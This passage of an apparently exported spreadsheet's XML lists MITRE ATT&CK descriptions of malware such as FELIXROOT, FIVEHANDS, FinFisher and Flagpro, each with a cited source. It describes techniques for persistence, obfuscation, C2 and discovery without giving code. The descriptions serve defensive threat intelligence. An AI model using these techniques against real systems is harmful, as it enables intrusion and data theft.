    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to decompress a local or remote CAB file into an executable.(Citation: Microsoft Expand Utility)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or upload a file over a network share.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or copy a file into an alternate data stream.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to use the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) can scan all .exe files located in the USB drive.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has commonly set file and path attributes to hidden.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to download a file to the infected system.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to write itself to Registry values.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to call the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has encrypted communications with the RC4 method.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the computer name from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve"> [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the username from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can delete malware and associated artifacts from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can search files on a victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) uses fake Transport Layer Security (TLS) to communicate with its C2 server.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) encrypts C2 data with RC4 encryption.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) collects MAC address and local IP address information from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can modify file or directory timestamps.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) has been installed as a Windows service.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts collected data with AES and Base64 and then sends it to the C2 server.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the .LNK file from the startup directory as well as the dropper components.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) downloads and uploads files to and from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the Registry key &lt;code&gt;HKCU\Software\Classes\Applications\rundll32.exe\shell\open&lt;/code&gt;.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts strings in the backdoor using a custom XOR algorithm.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects a list of running processes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) queries the Registry for specific keys for potential privilege escalation and proxy information. [FELIXROOT](https://attack.mitre.org/software/S0267) has also used WMI to query the Windows Registry.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) adds a shortcut file to the startup folder for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) checks for installed security software like antivirus and firewall.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) creates a .LNK file for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects information about the network including the IP address and DHCP server.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the username from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) gathers the time zone information from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses WMI to query the Windows Registry.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can receive a command line argument to limit file encryption to specified directories.(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can use an embedded NTRU public key to encrypt data for ransom.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to decrypt its payload prior to execution.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can enumerate network shares and mounted drives on a network.(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>The [FIVEHANDS](https://attack.mitre.org/software/S0618) payload is encrypted with AES-128.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can use WMI to delete files on a  target machine.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) employs the same encoding scheme as [SPACESHIP](https://attack.mitre.org/software/S0035) for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system. [FLASHFLOOD](https://attack.mitre.org/software/S0036) will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. [FLASHFLOOD](https://attack.mitre.org/software/S0036) also collects information stored in the Windows Address Book.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by [SPACESHIP](https://attack.mitre.org/software/S0035).(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) achieves persistence by making an entry in the Registry's Run key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) uses RDP to tunnel traffic from a victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) has the ability to decrypt an embedded .NET module.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) can search the &lt;code&gt;C:\Windows\Microsoft.NET\&lt;/code&gt; directory for files of a specified size.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[FYAnti](https://attack.mitre.org/software/S0628) can download additional payloads to a compromised host.(Citation: Securelist APT10 March 2021)	 </t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) has used ConfuserEx to pack its .NET module.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) contains a keylogger module.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>Some variants of [FakeM](https://attack.mitre.org/software/S0076) use SSL to communicate with C2 servers.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of [FakeM](https://attack.mitre.org/software/S0076) use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>The original variant of [FakeM](https://attack.mitre.org/software/S0076) encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of [FakeM](https://attack.mitre.org/software/S0076) use RC4 to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can call &lt;code&gt;ShellExecuteW&lt;/code&gt; to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from &lt;code&gt;HKCU\Software\Classes\http\shell\open\command&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used &lt;code&gt;HKLM\SOFTWARE\Microsoft\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) can download files from remote servers.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) has masqueraded as legitimate Adobe Content Management System files.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) checks for processes associated with anti-virus vendors.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom method for C2 traffic that utilizes Base64.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the system information, including hostname and OS version, and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the victim LAN IP address and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the current username and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses command line for execution.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use COM hijacking to establish persistence.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can delete files from a compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can run &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to check if a mouse is present.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use PowerShell scripts for execution.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has checked for AV software as part of its persistence process.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can run anti-sandbox checks using the Microsoft Excel 4.0 function &lt;code&gt;GET.WORKSPACE&lt;/code&gt; to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) can use &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to determine the OS version of the compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Ferocious](https://attack.mitre.org/software/S0679) has the ability to use Visual Basic scripts for execution.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) can dump Windows password hashes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) contains junk code in its functions in an effort to confuse disassembly programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>Some [FinFisher](https://attack.mitre.org/software/S0182) variants incorporate an MBR rootkit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) performs UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) clears the system event logs using &lt;code&gt; OpenEventLog/ClearEventLog APIs &lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) hooks processes by modifying IAT pointers to CreateWindowEx.(Citation: FinFisher Citation)(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses DLL search order hijacking.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses DLL side-loading to load malicious programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) extracts and decrypts stage 3 malware, which is stored in encrypted resources.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) injects itself into various processes depending on whether it is low integrity or high integrity.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) enumerates directories and scans for certain files.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) has used the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack the execution flow of a process by replacing the &lt;code&gt;__fnDWORD&lt;/code&gt; function with the address of a created [Asynchronous Procedure Call](https://attack.mitre.org/techniques/T1055/004) stub routine.(Citation: FinFisher exposed )</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) establishes persistence by creating the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\Run&lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) probes the system to check for antimalware processes.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses a custom packer.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks if the victim OS is 32 or 64-bit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses token manipulation with NtFilterToken as part of UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) creates a new Windows service with the malicious executable for persistence.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses Python code to deobfuscate base64-encoded strings.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obfuscates strings with base64 encoding.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains a list of running processes.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) creates a Registry Run key to establish persistence.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains victim Microsoft Windows version information and CPU architecture.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can check the name of the window displayed on the system.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can collect data from a compromised host, including Windows authentication information.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has exfiltrated data to the C2 server.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can download additional malware from the C2 server.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;net localgroup administrators&lt;/code&gt; command on a targeted system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has relied on users clicking a malicious attachment delivered through spearphishing.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can download malicious files with a .tmp extension and append them with .exe prior to execution.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute `net view` to discover mapped network shares.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been delivered within ZIP or RAR password-protected archived files.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;tasklist&lt;/code&gt; command on a compromised system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has dropped an executable file to the startup directory.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;net view&lt;/code&gt; on a targeted system.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has the ability to wait for a specified time interval between communicating with and executing commands from C2.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been distributed via spearphishing as an email attachment.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) has encoded bidirectional data communications between a target system and C2 server using Base64.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;ipconfig /all&lt;/code&gt; command on a victim system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;netstat -ano&lt;/code&gt; on a compromised host.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;whoami&lt;/code&gt; command on the system.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can execute malicious VBA macros embedded in .xlsm files.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Flagpro](https://attack.mitre.org/software/S0696) can communicate with its C2 using HTTP.(Citation: NTT Security Flagpro new December 2021) </t>
  </si>
  <si>
    <t>[Flagpro](https://attack.mitre.org/software/S0696) can use `cmd.exe` to execute commands received from C2.(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
